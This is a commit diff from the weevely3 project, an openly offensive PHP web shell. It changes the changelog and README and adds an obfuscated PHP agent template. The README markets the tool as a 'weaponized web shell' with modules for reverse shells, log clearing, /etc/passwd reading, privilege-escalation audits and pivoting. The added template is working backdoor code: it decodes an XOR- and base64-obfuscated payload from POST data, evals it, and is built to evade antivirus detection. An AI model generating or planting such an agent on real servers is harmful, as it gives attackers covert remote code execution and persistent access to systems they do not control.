Add some CLI options

CHANGELOG.md

@@ -1,5 +1,59 @@
 # Change Log
 
+## [v4.0.2] - 
+
+### Fixed
+- Broken file_edit #133
+
+## [v4.0.1] - 2020-01-06
+### Removed
+- Remove PHP minification
+
+### Fixed
+- Broken cd #122
+
+## [v4.0.0] - 2019-12-26
+### Added
+- Full port to Python 3
+
+### Fixed
+- Module net_phpproxy
+- Fixes alias management #117
+
+### Removed
+- Old backdoor formats LegacyCookie, LegacyReferrer, and Stegaref
+- Module backdoor_meterpreter
+
+## [v3.7.0] - 2018-10-15
+### Fixed
+- Fix vector handling in audit_etcpasswd #93
+
+### Added
+- HTTPS proxy support
+- Support OPTIONS request in net_curl module
+- Use httpbin for net_proxy testing
+
+## [v3.6.2] - 2018-06-27
+### Fixed
+- Remove audit_linuxprivchecker module
+
+## [v3.6.1] - 2018-06-26
+### Fixed
+- Fixed corrupted session file #83
+- Vendor files licensing
+
+### Added
+- Man page
+
+## [v3.6] - 2018-06-02
+### Fixed
+- PHP 7 support
+- Add exceptions catches
+
+### Added
+- ObfPost is the default channel to obfuscate traffic in POST requests
+- Travic-CI integration
+
 ## [v3.5] - 2017-23-11
 ### Fixed
 - Connection to HTTPS sites with wrong certificates
@@ -97,3 +151,10 @@
 [v3.2.0]: https://github.com/epinna/weevely3/releases/tag/v3.2.0
 [v3.3.1]: https://github.com/epinna/weevely3/releases/tag/v3.3.1
 [v3.4]: https://github.com/epinna/weevely3/releases/tag/v3.4
+[v3.5]: https://github.com/epinna/weevely3/releases/tag/v3.5
+[v3.6]: https://github.com/epinna/weevely3/releases/tag/v3.6
+[v3.6.1]: https://github.com/epinna/weevely3/releases/tag/v3.6.1
+[v3.6.2]: https://github.com/epinna/weevely3/releases/tag/v3.6.2
+[v3.7.0]: https://github.com/epinna/weevely3/releases/tag/v3.7.0
+[v4.0.0]: https://github.com/epinna/weevely3/releases/tag/v4.0.0
+[v4.0.1]: https://github.com/epinna/weevely3/releases/tag/v4.0.1

README.md

@@ -3,26 +3,94 @@ Weevely
 
 [![Build Status](https://travis-ci.org/epinna/weevely3.svg?branch=master)](https://travis-ci.org/epinna/weevely3)
 
-Weevely is a web shell designed for remote server administration and penetration testing that can be extended over the network at runtime with more than 30 modules.
+## Name
 
-It executes remote code via an obfuscated PHP agent located on the compromised HTTP server. It fits both web administration and penetration testing post-exploitation scenarios to maintain access, provide situational awareness, escalate the privileges, and move laterally in the network.
+Weevely - Weaponized web shell
 
-**Read the [Wiki](https://github.com/epinna/weevely3/wiki#getting-started) for tutorials and uses cases.**
+## Usage
 
-* Run operating system commands in a terminal
-* Pivot SQL console on the target
-* Proxy HTTP traffic on the target
-* Audit remote target
-* Mount the remote filesystem
-* Pivot port scan on target
+```
+weevely generate <password> <path>
+weevely <URL> <password> [cmd]
+```
+
+## Description
+
+Weevely is a web shell designed for post-exploitation purposes that can be extended over the network at runtime.
+
+Upload weevely PHP agent to a target web server to get remote shell access to it. It has more than 30 modules to assist administrative tasks, maintain access, provide situational awareness, elevate privileges, and spread into the target network.
+
+Read the [Install](https://github.com/epinna/weevely3/wiki/Install) page to install weevely and its dependencies.
+
+Read the [Getting Started](https://github.com/epinna/weevely3/wiki/Getting-Started) page to generate an agent and connect to it.
+
+Browse the [Wiki](https://github.com/epinna/weevely3/wiki) to read examples and use cases.
+
+### Features
+
+* Shell access to the target
+* SQL console pivoting on the target
+* HTTP/HTTPS proxy to browse through the target
 * Upload and download files
 * Spawn reverse and direct TCP shells
-* Upgrade to Meterpreter session
-* Bruteforce SQL accounts
-* Manage natively compressed archives
+* Audit remote target security
+* Port scan pivoting on target
+* Mount the remote filesystem
+* Bruteforce SQL accounts pivoting on the target
+
+### Agent
+
+The agent is a small, polymorphic PHP script hardly detected by AV and the communication protocol is obfuscated within HTTP requests.
+
+### Modules
 
-The agent is a small, polymorphic PHP script which is hardly detectable by AV software, and the communication between the client and the agent is obfuscated within HTTP requests.
+| Module                      | Description
+| --------------------------- | ------------------------------------------ |
+| :audit_filesystem           | Audit the file system for weak permissions.
+| :audit_suidsgid             |  Find files with SUID or SGID flags.
+| :audit_disablefunctionbypass|  Bypass disable_function restrictions with mod_cgi and .htaccess.
+| :audit_etcpasswd            |  Read /etc/passwd with different techniques.
+| :audit_phpconf              |  Audit PHP configuration.
+| :shell_sh                   |  Execute shell commands.
+| :shell_ssh                  |  Execute shell commands through SSH.
+| :shell_su                   |  Execute commands with su.
+| :shell_php                  |  Execute PHP commands.
+| :system_extensions          |  Collect PHP and webserver extension list.
+| :system_info                |  Collect system information.
+| :system_procs               |  List running processes.
+| :backdoor_reversetcp        |  Execute a reverse TCP shell.
+| :backdoor_tcp               |  Spawn a shell on a TCP port.
+| :bruteforce_sql             |  Bruteforce SQL database.
+| :file_gzip                  |  Compress or expand gzip files.
+| :file_clearlog              |  Remove string from a file.
+| :file_check                 |  Get attributes and permissions of a file.
+| :file_upload                |  Upload file to remote filesystem.
+| :file_webdownload           |  Download an URL.
+| :file_tar                   |  Compress or expand tar archives.
+| :file_download              |  Download file from remote filesystem.
+| :file_bzip2                 |  Compress or expand bzip2 files.
+| :file_edit                  |  Edit remote file on a local editor.
+| :file_grep                  |  Print lines matching a pattern in multiple files.
+| :file_ls                    |  List directory content.
+| :file_cp                    |  Copy single file.
+| :file_rm                    |  Remove remote file.
+| :file_upload2web            |  Upload file automatically to a web folder and get corresponding URL.
+| :file_zip                   |  Compress or expand zip files.
+| :file_touch                 |  Change file timestamp.
+| :file_find                  |  Find files with given names and attributes.
+| :file_mount                 |  Mount remote filesystem using HTTPfs.
+| :file_enum                  |  Check existence and permissions of a list of paths.
+| :file_read                  |  Read remote file from the remote filesystem.
+| :file_cd                    |  Change current working directory.
+| :sql_console                |  Execute SQL query or run console.
+| :sql_dump                   |  Multi dbms mysqldump replacement.
+| :net_mail                   |  Send mail.
+| :net_phpproxy               |  Install PHP proxy on the target.
+| :net_curl                   |  Perform a curl-like HTTP request.
+| :net_proxy                  |  Run local proxy to pivot HTTP/HTTPS browsing through the target.
+| :net_scan                   |  TCP Port scan.
+| :net_ifconfig               |  Get network interfaces addresses.
 
-### Modules development
+### Development
 
 Weevely is easily extendible to implement internal audit, account enumerator, sensitive data scraper, network scanner, make the modules work as a HTTP or SQL client and do a whole lot of other cool stuff.

bd/agents/obfpost_php.tpl

@@ -0,0 +1,28 @@
+<%! import hashlib, utils, string %><%
+passwordhash = hashlib.md5(password.encode('utf-8')).hexdigest().lower()
+key = passwordhash[:8]
+header = passwordhash[8:20]
+footer = passwordhash[20:32]
+
+PREPEND = utils.strings.randstr(16, charset = string.digits + string.ascii_letters).decode('utf-8')
+%>$k="${key}";$kh="${header}";$kf="${footer}";$p="${PREPEND}";
+<%text>
+function x($t,$k){
+$c=strlen($k);$l=strlen($t);$o="";
+for($i=0;$i<$l;){
+for($j=0;($j<$c&&$i<$l);$j++,$i++)
+{
+$o.=$t[$i]^$k[$j];
+}
+}
+return $o;
+}
+if (@preg_match("/$kh(.+)$kf/",@file_get_contents("php://input"),$m)==1) {
+@ob_start();
+@eval(@gzuncompress(@x(@base64_decode($m[1]),$k)));
+$o=@ob_get_contents();
+@ob_end_clean();
+$r=@base64_encode(@x(@gzcompress($o),$k));
+print("$p$kh$r$kf");
+}
+</%text>

bd/obfuscators/cleartext1_php.tpl

@@ -1,3 +1,3 @@
 <?php
-${agent}
-?>
+${agent.decode('utf-8')}
+?>